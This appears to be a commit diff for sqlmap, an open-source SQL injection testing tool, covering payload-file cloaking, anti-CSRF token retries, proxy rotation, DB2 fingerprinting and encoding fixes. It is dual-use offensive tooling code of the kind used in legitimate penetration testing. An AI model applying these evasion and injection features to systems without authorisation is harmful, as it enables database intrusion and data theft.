|
return xor(zlib.compress(data), KEY)
|
||||||
|
|
||||||
def decloak(inputFile=None, data=None):
|
def decloak(inputFile=None, data=None):
|
||||||
if data is None:
|
if data is None:
|
||||||
with open(inputFile, "rb") as f:
|
with open(inputFile, "rb") as f:
|
||||||
data = f.read()
|
data = f.read()
|
||||||
try:
|
try:
|
||||||
data = zlib.decompress(hideAscii(data))
|
data = zlib.decompress(xor(data, KEY))
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
print(ex)
|
print(ex)
|
||||||
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
|
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
|
||||||
@@ -52,7 +50,7 @@ def decloak(inputFile=None, data=None):
|
|||||||
|
|
||||||
def main():
|
def main():
|
||||||
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
||||||
parser = OptionParser(usage=usage, version='0.1')
|
parser = OptionParser(usage=usage, version='0.2')
|
||||||
|
|
||||||
try:
|
try:
|
||||||
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -336,6 +336,10 @@ def start():
|
|||||||
conf.httpHeaders.append((header, value))
|
conf.httpHeaders.append((header, value))
|
||||||
break
|
break
|
||||||
|
|
||||||
|
if conf.data:
|
||||||
|
# Note: explicitly URL encode __ ASP(.NET) parameters (e.g. to avoid problems with Base64 encoded '+' character) - standard procedure in web browsers
|
||||||
|
conf.data = re.sub(r"\b(__\w+)=([^&]+)", lambda match: "%s=%s" % (match.group(1), urlencode(match.group(2), safe='%')), conf.data)
|
||||||
|
|
||||||
conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
|
conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
|
||||||
|
|
||||||
initTargetEnv()
|
initTargetEnv()
|
||||||
|
|||||||
@@ -172,7 +172,7 @@ class Agent(object):
|
|||||||
|
|
||||||
newValue = "%s%s" % (value, newValue)
|
newValue = "%s%s" % (value, newValue)
|
||||||
|
|
||||||
newValue = self.cleanupPayload(newValue, origValue)
|
newValue = self.cleanupPayload(newValue, origValue) or ""
|
||||||
|
|
||||||
if base64Encoding:
|
if base64Encoding:
|
||||||
_newValue = newValue
|
_newValue = newValue
|
||||||
|
|||||||
@@ -116,6 +116,7 @@ from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
|||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
||||||
from lib.core.settings import DEV_EMAIL_ADDRESS
|
from lib.core.settings import DEV_EMAIL_ADDRESS
|
||||||
|
from lib.core.settings import DOLLAR_MARKER
|
||||||
from lib.core.settings import DUMMY_USER_INJECTION
|
from lib.core.settings import DUMMY_USER_INJECTION
|
||||||
from lib.core.settings import DYNAMICITY_BOUNDARY_LENGTH
|
from lib.core.settings import DYNAMICITY_BOUNDARY_LENGTH
|
||||||
from lib.core.settings import ERROR_PARSING_REGEXES
|
from lib.core.settings import ERROR_PARSING_REGEXES
|
||||||
@@ -2865,6 +2866,8 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
|
|||||||
result = None if value is None else ""
|
result = None if value is None else ""
|
||||||
|
|
||||||
if value:
|
if value:
|
||||||
|
value = re.sub(r"\b[$\w]+=", lambda match: match.group(0).replace('$', DOLLAR_MARKER), value)
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):
|
if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):
|
||||||
warnMsg = "if you experience problems with "
|
warnMsg = "if you experience problems with "
|
||||||
warnMsg += "non-ASCII identifier names "
|
warnMsg += "non-ASCII identifier names "
|
||||||
@@ -2899,6 +2902,8 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
|
|||||||
if spaceplus:
|
if spaceplus:
|
||||||
result = result.replace(_urllib.parse.quote(' '), '+')
|
result = result.replace(_urllib.parse.quote(' '), '+')
|
||||||
|
|
||||||
|
result = result.replace(DOLLAR_MARKER, '$')
|
||||||
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
def runningAsAdmin():
|
def runningAsAdmin():
|
||||||
@@ -4123,6 +4128,7 @@ def safeSQLIdentificatorNaming(name, isTable=False):
|
|||||||
|
|
||||||
# Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf)
|
# Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf)
|
||||||
if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
|
if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
|
||||||
|
if not conf.noEscape:
|
||||||
retVal = unsafeSQLIdentificatorNaming(retVal)
|
retVal = unsafeSQLIdentificatorNaming(retVal)
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
|
||||||
|
|||||||
@@ -198,8 +198,20 @@ def decodeBase64(value, binary=True, encoding=None):
|
|||||||
True
|
True
|
||||||
>>> decodeBase64("MTIz", binary=False)
|
>>> decodeBase64("MTIz", binary=False)
|
||||||
'123'
|
'123'
|
||||||
|
>>> decodeBase64(b"MTIzNA") == b"1234"
|
||||||
|
True
|
||||||
|
>>> decodeBase64("MTIzNA") == b"1234"
|
||||||
|
True
|
||||||
|
>>> decodeBase64("MTIzNA==") == b"1234"
|
||||||
|
True
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
padding = b'=' if isinstance(value, bytes) else '='
|
||||||
|
|
||||||
|
# Reference: https://stackoverflow.com/a/49459036
|
||||||
|
if not value.endswith(padding):
|
||||||
|
value += 3 * padding
|
||||||
|
|
||||||
retVal = base64.b64decode(value)
|
retVal = base64.b64decode(value)
|
||||||
|
|
||||||
if not binary:
|
if not binary:
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ _defaults = {
|
|||||||
"delay": 0,
|
"delay": 0,
|
||||||
"timeout": 30,
|
"timeout": 30,
|
||||||
"retries": 3,
|
"retries": 3,
|
||||||
|
"csrfRetries": 0,
|
||||||
"saFreq": 0,
|
"saFreq": 0,
|
||||||
"threads": 1,
|
"threads": 1,
|
||||||
"level": 1,
|
"level": 1,
|
||||||
|
|||||||
@@ -93,7 +93,6 @@ from lib.core.exception import SqlmapInstallationException
|
|||||||
from lib.core.exception import SqlmapMissingDependence
|
from lib.core.exception import SqlmapMissingDependence
|
||||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||||
from lib.core.exception import SqlmapMissingPrivileges
|
from lib.core.exception import SqlmapMissingPrivileges
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
from lib.core.exception import SqlmapSystemException
|
from lib.core.exception import SqlmapSystemException
|
||||||
@@ -984,13 +983,10 @@ def _setHTTPHandlers():
|
|||||||
|
|
||||||
with kb.locks.handlers:
|
with kb.locks.handlers:
|
||||||
if conf.proxyList is not None:
|
if conf.proxyList is not None:
|
||||||
if not conf.proxyList:
|
|
||||||
errMsg = "list of usable proxies is exhausted"
|
|
||||||
raise SqlmapNoneDataException(errMsg)
|
|
||||||
|
|
||||||
conf.proxy = conf.proxyList[0]
|
conf.proxy = conf.proxyList[0]
|
||||||
conf.proxyList = conf.proxyList[1:]
|
conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1]
|
||||||
|
|
||||||
|
if len(conf.proxyList) > 1:
|
||||||
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
|
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
|||||||
@@ -61,6 +61,7 @@ optDict = {
|
|||||||
"csrfToken": "string",
|
"csrfToken": "string",
|
||||||
"csrfUrl": "string",
|
"csrfUrl": "string",
|
||||||
"csrfMethod": "string",
|
"csrfMethod": "string",
|
||||||
|
"csrfRetries": "integer",
|
||||||
"forceSSL": "boolean",
|
"forceSSL": "boolean",
|
||||||
"chunked": "boolean",
|
"chunked": "boolean",
|
||||||
"hpp": "boolean",
|
"hpp": "boolean",
|
||||||
|
|||||||
@@ -18,7 +18,7 @@ from lib.core.enums import OS
|
|||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.4.6.0"
|
VERSION = "1.4.7.0"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
@@ -69,6 +69,7 @@ REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
|||||||
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||||
SAFE_VARIABLE_MARKER = "__SAFE__"
|
SAFE_VARIABLE_MARKER = "__SAFE__"
|
||||||
SAFE_HEX_MARKER = "__SAFE_HEX__"
|
SAFE_HEX_MARKER = "__SAFE_HEX__"
|
||||||
|
DOLLAR_MARKER = "__DOLLAR__"
|
||||||
|
|
||||||
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||||
@@ -605,7 +606,7 @@ BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
|||||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
SHELLCODEEXEC_RANDOM_STRING_MARKER = b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
# Period after last-update to start nagging about the old revision
|
# Period after last-update to start nagging about the old revision
|
||||||
LAST_UPDATE_NAGGING_DAYS = 60
|
LAST_UPDATE_NAGGING_DAYS = 180
|
||||||
|
|
||||||
# Minimum non-writing chars (e.g. ['"-:/]) ratio in case of parsed error messages
|
# Minimum non-writing chars (e.g. ['"-:/]) ratio in case of parsed error messages
|
||||||
MIN_ERROR_PARSING_NON_WRITING_RATIO = 0.05
|
MIN_ERROR_PARSING_NON_WRITING_RATIO = 0.05
|
||||||
|
|||||||
@@ -267,6 +267,9 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_argument("--csrf-method", dest="csrfMethod",
|
request.add_argument("--csrf-method", dest="csrfMethod",
|
||||||
help="HTTP method to use during anti-CSRF token page visit")
|
help="HTTP method to use during anti-CSRF token page visit")
|
||||||
|
|
||||||
|
request.add_argument("--csrf-retries", dest="csrfRetries", type=int,
|
||||||
|
help="Retries for anti-CSRF token retrieval (default %d)" % defaults.csrfRetries)
|
||||||
|
|
||||||
request.add_argument("--force-ssl", dest="forceSSL", action="store_true",
|
request.add_argument("--force-ssl", dest="forceSSL", action="store_true",
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
|
|||||||
@@ -1045,6 +1045,8 @@ class Connect(object):
|
|||||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
|
auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
|
||||||
|
|
||||||
if conf.csrfToken:
|
if conf.csrfToken:
|
||||||
|
token = AttribDict()
|
||||||
|
|
||||||
def _adjustParameter(paramString, parameter, newValue):
|
def _adjustParameter(paramString, parameter, newValue):
|
||||||
retVal = paramString
|
retVal = paramString
|
||||||
|
|
||||||
@@ -1061,7 +1063,15 @@ class Connect(object):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
token = AttribDict()
|
for attempt in xrange(conf.csrfRetries + 1):
|
||||||
|
if token:
|
||||||
|
break
|
||||||
|
|
||||||
|
if attempt > 0:
|
||||||
|
warnMsg = "unable to find anti-CSRF token '%s' at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url)
|
||||||
|
warnMsg += ". sqlmap is going to retry the request"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||||
page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...')
|
page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...')
|
||||||
|
|
||||||
|
|||||||
@@ -484,7 +484,7 @@ def vbulletin_passwd(password, salt, **kwargs):
|
|||||||
def wordpress_passwd(password, salt, count, prefix, **kwargs):
|
def wordpress_passwd(password, salt, count, prefix, **kwargs):
|
||||||
"""
|
"""
|
||||||
Reference(s):
|
Reference(s):
|
||||||
http://packetstormsecurity.org/files/74448/phpassbrute.py.txt
|
https://web.archive.org/web/20120219120128/packetstormsecurity.org/files/74448/phpassbrute.py.txt
|
||||||
http://scriptserver.mainframe8.com/wordpress_password_hasher.php
|
http://scriptserver.mainframe8.com/wordpress_password_hasher.php
|
||||||
|
|
||||||
>>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp')
|
>>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp')
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
|
|||||||
import imp
|
import imp
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
import sys
|
import sys
|
||||||
import traceback
|
import traceback
|
||||||
import warnings
|
import warnings
|
||||||
@@ -41,7 +42,12 @@ def getSafeExString(ex, encoding=None): # Cross-referenced function
|
|||||||
class SQLAlchemy(GenericConnector):
|
class SQLAlchemy(GenericConnector):
|
||||||
def __init__(self, dialect=None):
|
def __init__(self, dialect=None):
|
||||||
GenericConnector.__init__(self)
|
GenericConnector.__init__(self)
|
||||||
|
|
||||||
self.dialect = dialect
|
self.dialect = dialect
|
||||||
|
self.address = conf.direct
|
||||||
|
|
||||||
|
if self.dialect:
|
||||||
|
self.address = re.sub(r"\A.+://", "%s://" % self.dialect, self.address)
|
||||||
|
|
||||||
def connect(self):
|
def connect(self):
|
||||||
if _sqlalchemy:
|
if _sqlalchemy:
|
||||||
@@ -52,18 +58,15 @@ class SQLAlchemy(GenericConnector):
|
|||||||
if not os.path.exists(self.db):
|
if not os.path.exists(self.db):
|
||||||
raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db)
|
raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db)
|
||||||
|
|
||||||
_ = conf.direct.split("//", 1)
|
_ = self.address.split("//", 1)
|
||||||
conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db))
|
self.address = "%s////%s" % (_[0], os.path.abspath(self.db))
|
||||||
|
|
||||||
if self.dialect:
|
|
||||||
conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1)
|
|
||||||
|
|
||||||
if self.dialect == "sqlite":
|
if self.dialect == "sqlite":
|
||||||
engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False})
|
engine = _sqlalchemy.create_engine(self.address, connect_args={"check_same_thread": False})
|
||||||
elif self.dialect == "oracle":
|
elif self.dialect == "oracle":
|
||||||
engine = _sqlalchemy.create_engine(conf.direct)
|
engine = _sqlalchemy.create_engine(self.address)
|
||||||
else:
|
else:
|
||||||
engine = _sqlalchemy.create_engine(conf.direct, connect_args={})
|
engine = _sqlalchemy.create_engine(self.address, connect_args={})
|
||||||
|
|
||||||
self.connector = engine.connect()
|
self.connector = engine.connect()
|
||||||
except (TypeError, ValueError):
|
except (TypeError, ValueError):
|
||||||
|
|||||||
@@ -97,11 +97,20 @@ class Fingerprint(GenericFingerprint):
|
|||||||
logMsg = "confirming %s" % DBMS.DB2
|
logMsg = "confirming %s" % DBMS.DB2
|
||||||
logger.info(logMsg)
|
logger.info(logMsg)
|
||||||
|
|
||||||
version = self._versionCheck()
|
result = inject.checkBooleanExpression("JULIAN_DAY(CURRENT DATE) IS NOT NULL")
|
||||||
|
|
||||||
|
if not result:
|
||||||
|
warnMsg = "the back-end DBMS is not %s" % DBMS.DB2
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
version = self._versionCheck()
|
||||||
if version:
|
if version:
|
||||||
Backend.setVersion(version)
|
Backend.setVersion(version)
|
||||||
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
|
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
|
||||||
|
else:
|
||||||
|
setDbms(DBMS.DB2)
|
||||||
|
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
|
|||||||
@@ -189,6 +189,9 @@ csrfUrl =
|
|||||||
# HTTP method to use during anti-CSRF token page visit.
|
# HTTP method to use during anti-CSRF token page visit.
|
||||||
csrfMethod =
|
csrfMethod =
|
||||||
|
|
||||||
|
# Retries for anti-CSRF token retrieval.
|
||||||
|
csrfRetries =
|
||||||
|
|
||||||
# Force usage of SSL/HTTPS
|
# Force usage of SSL/HTTPS
|
||||||
# Valid: True or False
|
# Valid: True or False
|
||||||
forceSSL = False
|
forceSSL = False
|
||||||
|
|||||||
4
thirdparty/identywaf/identYwaf.py
vendored
4
thirdparty/identywaf/identYwaf.py
vendored
@@ -60,7 +60,7 @@ else:
|
|||||||
HTTPCookieProcessor = urllib2.HTTPCookieProcessor
|
HTTPCookieProcessor = urllib2.HTTPCookieProcessor
|
||||||
|
|
||||||
NAME = "identYwaf"
|
NAME = "identYwaf"
|
||||||
VERSION = "1.0.124"
|
VERSION = "1.0.127"
|
||||||
BANNER = r"""
|
BANNER = r"""
|
||||||
` __ __ `
|
` __ __ `
|
||||||
____ ___ ___ ____ ______ `| T T` __ __ ____ _____
|
____ ___ ___ ____ ______ `| T T` __ __ ____ _____
|
||||||
@@ -125,7 +125,7 @@ codes = set()
|
|||||||
proxies = list()
|
proxies = list()
|
||||||
proxies_index = 0
|
proxies_index = 0
|
||||||
|
|
||||||
_exit = exit
|
_exit = sys.exit
|
||||||
|
|
||||||
def exit(message=None):
|
def exit(message=None):
|
||||||
if message:
|
if message:
|
||||||
|
|||||||
9
thirdparty/multipart/multipartpost.py
vendored
9
thirdparty/multipart/multipartpost.py
vendored
@@ -23,6 +23,7 @@ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|||||||
import io
|
import io
|
||||||
import mimetypes
|
import mimetypes
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
import stat
|
import stat
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
@@ -67,6 +68,14 @@ class MultipartPostHandler(_urllib.request.BaseHandler):
|
|||||||
request.add_unredirected_header("Content-Type", contenttype)
|
request.add_unredirected_header("Content-Type", contenttype)
|
||||||
|
|
||||||
request.data = data
|
request.data = data
|
||||||
|
|
||||||
|
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235
|
||||||
|
if request.data:
|
||||||
|
for match in re.finditer(b"(?i)\s*-{20,}\w+(\s+Content-Disposition[^\n]+\s+|\-\-\s*)", request.data):
|
||||||
|
part = match.group(0)
|
||||||
|
if b'\r' not in part:
|
||||||
|
request.data = request.data.replace(part, part.replace(b'\n', b"\r\n"))
|
||||||
|
|
||||||
return request
|
return request
|
||||||
|
|
||||||
def multipart_encode(self, vars, files, boundary=None, buf=None):
|
def multipart_encode(self, vars, files, boundary=None, buf=None):
|
||||||
|
|||||||
Reference in New Issue
Block a user